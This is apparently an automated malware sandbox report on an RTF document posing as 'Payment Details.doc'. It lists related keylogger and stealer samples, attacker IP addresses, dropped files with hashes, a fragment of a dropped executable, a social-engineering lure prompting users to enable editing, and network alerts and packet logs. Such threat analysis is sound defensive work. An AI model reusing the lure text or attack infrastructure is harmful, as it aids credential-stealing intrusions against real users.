                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                            • 149.154.167.220
                                            inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                            • 149.154.167.220
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            TELEGRAMRUThyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            http://mintlink32.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                            • 149.154.167.99
                                            https://bostempek.vercel.app/Get hashmaliciousPorn ScamBrowse
                                            • 149.154.167.99
                                            https://telegram-privatefree.pages.dev/Get hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            http://tes.lavender8639.workers.dev/Get hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            https://live-prons-sex.pages.dev/Get hashmaliciousPorn ScamBrowse
                                            • 149.154.167.99
                                            https://telegrambot-resolved.pages.dev/Get hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            http://tw2-mzd.pages.dev/Get hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            CLOUDFLARENETUSQUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            450230549.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.159.134.233
                                            64.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.61.3
                                            450230549.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.134.233
                                            PO-100001499.exeGet hashmaliciousFormBookBrowse
                                            • 188.114.96.3
                                            ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                            • 104.21.64.108
                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            https://qwehikd-asdu.xyz/Get hashmaliciousUnknownBrowse
                                            • 188.114.96.3
                                            https://geminishdw-dws.top/Get hashmaliciousUnknownBrowse
                                            • 188.114.97.3
                                            UTMEMUSThyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.8.169
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 132.226.247.73
                                            SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 132.226.247.73
                                            file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 132.226.247.73
                                            rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                            • 132.226.247.73
                                            cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 132.226.247.73
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            05af1f5ca1b87cc9cc9b25185115607dThyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 188.114.97.3
                                            Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 188.114.97.3
                                            1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 188.114.97.3
                                            K0hpP6V2fo.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                            • 188.114.97.3
                                            AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 188.114.97.3
                                            SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 188.114.97.3
                                            Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                                            • 188.114.97.3
                                            36f7277af969a6947a61ae0b815907a1Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                            • 149.154.167.220
                                            14bnOjMV2N.docGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            6b58b6.msiGet hashmaliciousPureLog StealerBrowse
                                            • 149.154.167.220
                                            RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                            • 149.154.167.220
                                            RFQ.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 149.154.167.220
                                            SWIFT DETAILS-ERROR.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.26981.24309.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe | Payment Slip.doc | malicious | Snake Keylogger, VIP Keylogger
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe | Payment Slip.doc | malicious | Snake Keylogger, VIP Keylogger
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:@...e...........................................................
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):704000
                                                Entropy (8bit):7.875943883609069
                                                Encrypted:false
                                                SSDEEP:12288:nqR++ZR3W83B1LViDaDHkzrmvK0eVMfNHczr9wdG7gZf0mMlJEdtTJJ:nE++Zc8NilrAKHV+NHcH9F7jmMb4
                                                MD5:42F2CE52A57E0D72EAC297A532354E42
                                                SHA1:7F2F1EF38365147865F1CEC2C1D0AD62CDC6F7D0
                                                SHA-256:516FFDB4EF149292E235BEA6B676674D973E52C3382FDD3C40F85245F9E564BA
                                                SHA-512:6BD38183780B7DC761CFEAAFB3742F17A1CEADE827FC0D815CFF8969F0FD530E4ACE5FB70754E056FED44939EF774A4F5EF4B6A7FE9EC2F4C43BB3C49D4BFEEE
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 29%
                                                Joe Sandbox View:
                                                • Filename: Payment Slip.doc, Detection: malicious, Browse
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):16384
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:CE338FE6899778AACFC28414F2D9498B
                                                SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                Malicious:false
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):93184
                                                Entropy (8bit):3.521847451767833
                                                Encrypted:false
                                                SSDEEP:768:6gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gIS:pSyemuSyemuSyemuSyemuSyemm1ezHTO
                                                MD5:FDD6243B84E1E9FB5D2969D4C64D1E62
                                                SHA1:FB0A4B12E4178A0EA5624DC3C96C94218F2CAFC8
                                                SHA-256:C6B9262DCB25A127205869DB042A52AA304935D14CDE045DCC8F280BDE87D823
                                                SHA-512:F682B4C724CA53035C1E08985D55CE85DC46560C4C4C88541D3FCB0AE3D2B6FABEBA7977659863BF89440594CCCB21E7D270001FD0BF85D03E0B879EF52715F6
                                                Malicious:false
                                                Preview:4.7.7.0.4.9.1.8.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1536
                                                Entropy (8bit):1.357318797251612
                                                Encrypted:false
                                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbS:IiiiiiiiiifdLloZQc8++lsJe1MzB
                                                MD5:F81A16138F994EE04B29A4AD2EC9B830
                                                SHA1:E367EDB3AD7944C7E2FF5B72D439BF6EA98E427B
                                                SHA-256:48802A32AF2857EB5606D0048EDBEFBC2B16660E0CD15022CD3C47E07716E838
                                                SHA-512:A6C01D14440DBFA70359FD11CC70949DCC50C4E0B80E41939CA41A846DCCBE829C186EA63145E447428C584AB2FFC7DE23288248C18858F52F74D40A1F09C44A
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Thu Sep 26 06:24:54 2024, length=541766, window=hide
                                                Category:dropped
                                                Size (bytes):1039
                                                Entropy (8bit):4.551873477181621
                                                Encrypted:false
                                                SSDEEP:24:85Hn/XTnSd4XWWu+cgJePeJ8Dv3qekw57u:89n/XTA4G+JGAekw9u
                                                MD5:8B3A5CB173191B5FE8A6AA842726DF8B
                                                SHA1:3673A534D429CB05E1A1D8CA07213EA4CE55E2AB
                                                SHA-256:AA5CD23F5FEBF651EE7423EFC5E375179D753708072BBAA8CEA8AB99A8BDA1B4
                                                SHA-512:BEE9475438C70ECF74D3011B2F353BF2C8E893C66757F5EAC4850436E837D0C1055D09F043D86312701CFEACBDB37E5B037EE2E99C4D9AE9D15BADE8BAC57DF0
                                                Malicious:false
                                                Preview:L..................F.... ...{...r...{...r...3@./....FD...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....:Y.;..user.8......QK.X:Y.;*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.FD..:Y.; .PAYMEN~1.DOC..T.......WD..WD.*.........................P.a.y.m.e.n.t. .D.e.t.a.i.l.s...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop\Payment Details.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.a.y.m.e.n.t. .D.e.t.a.i.l.s...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......609290..........D_....3N...W...9..W.e8...8...
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Generic INItialization configuration [folders]
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):4.638759133144317
                                                Encrypted:false
                                                SSDEEP:3:M1OeLCvmUm42eLCvmUv:MMeIYeIl
                                                MD5:050F4E054DCD7B7C414ED9D34978C0C7
                                                SHA1:C6E5E10900348EA75DE84EBC6C7ECED98E6CF8B1
                                                SHA-256:B74618C3B807ED4AE387C404AB747827F5DCBC3FDEEA8DE6C3AB82AF99D23F30
                                                SHA-512:8F4C2C0D5597FA5A46CBC4F15D57314995850D600C6BFA64B11493EA9D16BFD579A2CEDD6C3824C95C90555826557113F32963E3B3FB107CA22A8D95B5054D2F
                                                Malicious:false
                                                Preview:[doc]..Payment Details.LNK=0..[folders]..Payment Details.LNK=0..
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.4797606462020307
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview:..
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):704000
                                                Entropy (8bit):7.875943883609069
                                                Encrypted:false
                                                SSDEEP:12288:nqR++ZR3W83B1LViDaDHkzrmvK0eVMfNHczr9wdG7gZf0mMlJEdtTJJ:nE++Zc8NilrAKHV+NHcH9F7jmMb4
                                                MD5:42F2CE52A57E0D72EAC297A532354E42
                                                SHA1:7F2F1EF38365147865F1CEC2C1D0AD62CDC6F7D0
                                                SHA-256:516FFDB4EF149292E235BEA6B676674D973E52C3382FDD3C40F85245F9E564BA
                                                SHA-512:6BD38183780B7DC761CFEAAFB3742F17A1CEADE827FC0D815CFF8969F0FD530E4ACE5FB70754E056FED44939EF774A4F5EF4B6A7FE9EC2F4C43BB3C49D4BFEEE
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 29%
                                                Joe Sandbox View:
                                                • Filename: Payment Slip.doc, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......$......v.... ........@.. ....................... ............@.................................$...O........ ........................................................................... ............... ..H............text...|.... ...................... ..`.rsrc.... ......."..................@..@.reloc..............................@..B................X.......H........Y..\5..........,....&...........................................0..|........(..........(....}......{....(....}........(....}........(....}........(....}........(....}........(....}........(....}....*.0..!..........(.... l...Y m...Z..(....X.+..*....0..m........s....}..... ....}.....#......cA}..... .ig.}.....#......c.}..... .'....s....}........s....}......}......}.....(.......(.......8..........>...%..,.o....s.......{.....{....(....}......{.....{....( ...}......{.....{
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.4797606462020307
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (46361), with CRLF, CR, LF line terminators
                                                Entropy (8bit):2.737409172276696
                                                TrID:
                                                • Rich Text Format (4004/1) 100.00%
                                                File name:Payment Details.doc
                                                File size:541'766 bytes
                                                MD5:cab2151d548586a1b3321aba7bde603d
                                                SHA1:6ada134af583ecda2a082aeb17a3a258a0cd548f
                                                SHA256:9e487bc68596a0c3c19aa9fed8040f452b4cbeca97451952994da511d4db2773
                                                SHA512:c06b7002dfa67749deff7a4f2ca709ff8f24994d494b497fcf58c3d19109f8f5bc6d357dc778c826c1071d8db5bec0994dfa70362fb91c9911b3f8f9faa6926a
                                                SSDEEP:6144:rwAYwAYwAYwAYwAtho2R3Ht7DPyvUCHsPPNJ22eN:F2
                                                TLSH:B2B4452DD30B01599FA2437B9B5B1E5546BCBA3EF38011B0346C537933EAC3996226BD
                                                File Content Preview:{\rt..{\*\XKYydH5QOtsSHYGOOiVm75xrrFZ6CHXBAuJ7qhlbBadf7cHdo4a8LY9dSepyeeJJXYBFOK4B0S63ife6nzC60yfiOFiARFc4IG2cRhNxUXArEDkZzVHwEutsL5BwicrD66nV9L7iJsjPon0q4fixDtFuxB5ZeHTXb5NDgmhD7UjxdvpgfTPR5R9ZtZNMOmqqTEg1BZWFaP2npAbsSzHez6zf}..{\747704918please click En
                                                Icon Hash:2764a3aaaeb7bdbf
                                                 Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                 2024-09-26T09:25:01.423749+0200 | 2022050 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 | 1 | 66.63.187.123 | 80 | 192.168.2.22 | 49163 | TCP
                                                 2024-09-26T09:25:01.577030+0200 | 2022051 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 | 1 | 66.63.187.123 | 80 | 192.168.2.22 | 49163 | TCP
                                                 2024-09-26T09:25:10.807351+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49164 | 132.226.247.73 | 80 | TCP
                                                 2024-09-26T09:25:11.914961+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49164 | 132.226.247.73 | 80 | TCP
                                                 2024-09-26T09:25:12.311060+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49166 | 188.114.97.3 | 443 | TCP
                                                 2024-09-26T09:25:17.999080+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49167 | 193.122.130.0 | 80 | TCP
                                                 2024-09-26T09:25:29.958052+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49173 | 188.114.97.3 | 443 | TCP
                                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Sep 26, 2024 09:25:01.864909887 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864909887 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864909887 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864909887 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864909887 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864934921 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864947081 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864957094 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864978075 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865009069 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865041018 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865052938 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865062952 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865073919 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865080118 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865083933 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865094900 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865094900 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865108967 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865123987 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865170002 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865189075 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865211964 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865283966 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865294933 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865304947 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865314960 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865324020 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865325928 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865339041 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865487099 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865494967 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865498066 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865509033 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865520000 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865520954 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865530014 CEST804916366.63.187.123192.168.2.22
